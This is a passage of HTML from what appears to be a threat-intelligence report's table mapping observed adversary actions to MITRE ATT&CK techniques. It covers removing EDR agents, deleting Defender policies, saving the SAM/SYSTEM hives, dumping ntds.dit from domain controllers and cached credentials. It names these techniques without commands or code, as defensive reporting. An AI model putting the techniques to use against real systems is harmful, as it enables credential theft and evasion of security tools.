style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T</span></span><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">he adversary was able to uninstall EDR agents from hosts and<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">attempted</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>to delete Windows Defender policies.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1872731162" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{49}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">4</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="25" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1893928132" paraeid="{fd4a2d05-a868-4429-8a41-f3846804b0e8}{229}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Credential access</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="812119972" paraeid="{fd4a2d05-a868-4429-8a41-f3846804b0e8}{227}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="167510213" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{79}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1003.002: OS Credential Dumping: Security Account Manager</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1662893162" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{86}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T</span></span><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">he adversary saved SAM and SYSTEM registry hives to extract local account hashes.&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1402810567" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{95}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">2</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="26" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1900186778" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{37}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="966733465" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{103}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1003.003: OS Credential Dumping: NTDS&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="266147457" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{110}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">The adversary dumped the<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">ntds.dit</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>file from Domain Controllers to obtain domain-wide credential hashes.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1465270665" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{117}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="27" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="416053367" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{41}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1847160772" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{125}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">T1003.005: Cached Domain Credentials&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="2038836703" paraeid="{b806cb29-e9b3-40de-972e-e2c12e0de0f1}{132}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" 